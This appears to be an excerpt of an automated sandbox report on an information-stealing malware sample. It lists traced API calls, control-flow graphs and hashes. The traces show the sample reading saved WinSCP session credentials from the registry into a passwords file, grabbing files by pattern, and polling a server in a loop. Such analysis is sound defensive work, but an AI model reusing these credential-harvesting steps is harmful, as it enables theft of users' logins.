                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                                              • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                              • Opcode ID: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                              • Instruction ID: 28db25313739fa7c55f0f4920395dc49f99e05777687f376b1cd2e96ad76a857
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54115E71A00219DBCB14DBD8D885BFDB7B9BB44300F54406EE605A3182DB785A89CBA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00410220 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00F6E978,?,00401074,00F6E978,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00F6E978,?,00401074,00F6E978,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00F6E978), ref: 00410247
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                                                              • Opcode ID: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                              • Instruction ID: 19b93291ffa213a11ad41bdc802fd7864df3898d1af9124162a70396b117772a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88D012B9551228BBE7009BD49D0DFDA7B6DDB06751F001192FB05D3240D5F0590047E1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00410540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                                                              • Opcode ID: bd3555a00e90356374530ad1ecd833fb0b90ce51521324ff3aaf46634910a84e
                                                                                                                                                                                                                                              • Instruction ID: 3be55b1de734e5e70e2884e79743f6c7e3890d625af739cc694376e2c6be9e3c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd3555a00e90356374530ad1ecd833fb0b90ce51521324ff3aaf46634910a84e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17D012B590011CDBC710DB90EC85AAAB7BDAB48600F404695EF05A2140E6756A1D8AE5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0040C3F0 Relevance: 96.6, APIs: 40, Strings: 15, Instructions: 370registryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C42B
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C44A
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C462
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C47A
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C48D
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C49B
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C4AC
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,"@), ref: 0040C4CE
                                                                                                                                                                                                                                              • RegGetValueA.ADVAPI32("@,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C50F
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32("@), ref: 0040C51D
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32("@), ref: 0040C52D
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,"@), ref: 0040C547
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset$CloseOpen$Value
                                                                                                                                                                                                                                              • String ID: "@$:22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                              • API String ID: 523579505-1877921674
                                                                                                                                                                                                                                              • Opcode ID: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                              • Instruction ID: 2eae617b6bbfa68bfe5d41b46deb2d66e6faa0f044e0e836418075379cf6a55f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCD17BB590022DEFDB10DBE4CC85EEFBB7DAB48705F10455AF605A3280D7786E488BA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00416548 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 215stringfileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1899 416548-41654f 1900 416550-416564 StrCmpCA 1899->1900 1901 416867-41687a FindNextFileA 1900->1901 1902 41656a-41657e StrCmpCA 1900->1902 1901->1900 1903 416880-416899 FindClose call 40fea0 1901->1903 1902->1901 1904 416584-4165b5 wsprintfA StrCmpCA 1902->1904 1910 41689d-4168c4 call 40fea0 * 2 1903->1910 1906 4165e0-4165fd wsprintfA 1904->1906 1907 4165b7-4165de wsprintfA 1904->1907 1909 416600-416640 memset lstrcat strtok_s 1906->1909 1907->1909 1911 416642-416653 1909->1911 1912 41666f-4166ac memset lstrcat strtok_s 1909->1912 1913 416801-416809 1911->1913 1921 416659-41666d strtok_s 1911->1921 1912->1913 1914 4166b2-4166c2 PathMatchSpecA 1912->1914 1913->1901 1919 41680b-416819 1913->1919 1916 416754-416768 strtok_s 1914->1916 1917 4166c8-416752 call 411450 wsprintfA call 40fea0 DeleteFileA CopyFileA call 4118d0 call 419670 1914->1917 1916->1914 1924 41676e 1916->1924 1917->1916 1939 416773-41677e 1917->1939 1919->1903 1925 41681b-416823 1919->1925 1921->1911 1921->1912 1924->1913 1925->1901 1926 416825-416861 call 401120 call 4164a0 1925->1926 1926->1901 1940 4168c5-4168d8 call 40fea0 1939->1940 1941 416784-4167aa call 40fe20 call 406e80 1939->1941 1940->1910 1948 4167f4-4167fb DeleteFileA 1941->1948 1949 4167ac-4167ef call 40fe20 call 401120 call 4153e0 call 40fea0 1941->1949 1948->1913 1949->1948
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00427618,?,?,?,?,?,?,?,00416AC2,?), ref: 0041655C
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0042761C,?,?,?,?,?,?,?,00416AC2,?), ref: 00416576
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0041659B
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00427343,?,?,?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 004165AD
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004165D5
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004165F7
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041660D
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00416620
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00416636
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00416663
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041667C
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041668C
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 004166A2
                                                                                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004166BA
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004166FD
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00416718
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041672E
                                                                                                                                                                                                                                                • Part of subcall function 004118D0: CreateFileA.KERNEL32(@gA,80000000,00000003,00000000,00000003,00000080,00000000,?,00416740,?), ref: 004118ED
                                                                                                                                                                                                                                                • Part of subcall function 004118D0: GetFileSizeEx.KERNEL32(00000000,?), ref: 004118FF
                                                                                                                                                                                                                                                • Part of subcall function 004118D0: CloseHandle.KERNEL32(00000000), ref: 0041190A
                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041674B
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041675E
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 004167FB
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416872
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416884
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$strtok_swsprintf$CloseDeleteFindlstrcatmemset$CopyCreateHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\%s\%s
                                                                                                                                                                                                                                              • API String ID: 3540076140-2927280355
                                                                                                                                                                                                                                              • Opcode ID: 723228165f9c214288ddb40b34de1f30534ec9953c5203047287f0891c5065a3
                                                                                                                                                                                                                                              • Instruction ID: c7960d27603167e2095e1da8c747364c01f2345784f24c67a0cfb0406d393024
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723228165f9c214288ddb40b34de1f30534ec9953c5203047287f0891c5065a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2871BAB5900219ABDB24DF94DC85EEE737DEB48704F10855EF50993241EB38EE88CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00414330 Relevance: 39.7, APIs: 11, Strings: 11, Instructions: 1203sleepCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1957 414330-414415 call 40fe10 * 3 call 40feb0 * 3 call 40fe20 * 6 1982 414418-41441f call 402760 1957->1982 1985 414425-414541 call 402480 call 40ff00 call 40fea0 call 4024e0 call 40fe60 * 5 call 413a40 call 40ff00 1982->1985 1986 414546-414640 call 402480 call 4024b0 call 40fe60 * 3 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 1982->1986 2036 4146b7-4146ba call 40fea0 1985->2036 2023 414642-414699 call 4024e0 call 40fe60 * 2 call 401120 call 413a40 1986->2023 2024 4146bf-4146d5 call 4100c0 StrCmpCA 1986->2024 2067 41469e-4146b1 call 40ff00 2023->2067 2033 4152a6-4153ac call 40ff00 call 4024e0 call 40ff00 call 40fea0 call 402770 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2024->2033 2034 4146db-4146e2 call 402750 2024->2034 2403 4153b0-4153d6 call 40fea0 * 2 2033->2403 2045 414892-4148a8 call 4100c0 StrCmpCA 2034->2045 2046 4146e8-4146ef call 402760 2034->2046 2036->2024 2056 415197-4152a1 call 40ff00 call 402570 call 40ff00 call 40fea0 call 4027a0 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2045->2056 2057 4148ae-4148b5 call 402760 2045->2057 2059 4146f5-414791 call 402510 call 40ff00 call 40fea0 call 402570 call 40fe60 call 402510 call 401120 call 413a40 call 40ff00 2046->2059 2060 414796-414813 call 402510 call 402540 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2046->2060 2056->2403 2076 414a7b-414a94 call 4100c0 StrCmpCA 2057->2076 2077 4148bb-4148c2 call 402760 2057->2077 2234 41488a-41488d call 40fea0 2059->2234 2060->2045 2187 414815-414884 call 402570 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2060->2187 2067->2036 2098 415085-415192 call 40ff00 call 402600 call 40ff00 call 40fea0 call 4027d0 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2076->2098 2099 414a9a-414aa1 call 402760 2076->2099 2096 4148c8-41496a call 4025a0 call 40ff00 call 40fea0 call 402600 call 40fe60 call 4025a0 call 401120 call 413a40 call 40ff00 2077->2096 2097 41496f-4149f2 call 4025a0 call 4025d0 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2077->2097 2306 414a73-414a76 call 40fea0 2096->2306 2097->2076 2262 4149f8-414a6d call 402600 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2097->2262 2098->2403 2124 414c51-414c67 call 4100c0 StrCmpCA 2099->2124 2125 414aa7-414aae call 402760 2099->2125 2146 414f70-415080 call 40ff00 call 402690 call 40ff00 call 40fea0 call 402800 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2124->2146 2147 414c6d-414c74 call 402760 2124->2147 2144 414b55-414bd2 call 402630 call 402660 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2125->2144 2145 414ab4-414b50 call 402630 call 40ff00 call 40fea0 call 402690 call 40fe60 call 402630 call 401120 call 413a40 call 40ff00 2125->2145 2144->2124 2330 414bd4-414c43 call 402690 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2144->2330 2367 414c49-414c4c call 40fea0 2145->2367 2146->2403 2180 414e30-414e46 call 4100c0 StrCmpCA 2147->2180 2181 414c7a-414c81 call 402760 2147->2181 2223 414e58-414f6b call 40ff00 call 402720 call 40ff00 call 40fea0 call 402830 call 40ff00 call 40fea0 call 40fe60 * 3 call 40fea0 * 10 2180->2223 2224 414e48-414e53 Sleep 2180->2224 2218 414c87-414d29 call 4026c0 call 40ff00 call 40fea0 call 402720 call 40fe60 call 4026c0 call 401120 call 413a40 call 40ff00 2181->2218 2219 414d2e-414db1 call 4026c0 call 4026f0 call 401120 call 413b80 call 40ff00 call 40fea0 call 4100c0 StrCmpCA 2181->2219 2187->2234 2425 414e28-414e2b call 40fea0 2218->2425 2219->2180 2388 414db3-414e25 call 402720 call 40fe60 * 2 call 401120 call 413a40 call 40ff00 2219->2388 2223->2403 2224->1982 2234->2045 2262->2306 2306->2076 2330->2367 2367->2124 2388->2425 2425->2180
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414638
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                • Part of subcall function 00413A40: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004146CD
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041480B
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148A0
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004149EA
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414A8C
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414BCA
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414C5F
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DA9
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E3E
                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 00414E4D
                                                                                                                                                                                                                                                • Part of subcall function 00413B80: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                • Part of subcall function 00413B80: StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                              • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                              • API String ID: 507064821-1903984052
                                                                                                                                                                                                                                              • Opcode ID: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                              • Instruction ID: 6a2bbd2f173dbc1054a30c93a0a01a9f01b5700f65783502aefbb1eff031eee4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AB28470C01248EACB14EBB5C9566DDBBB86F15308F5480BEE945736C2DB78670CCBA6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00407440 Relevance: 33.6, APIs: 22, Instructions: 569stringfilememoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
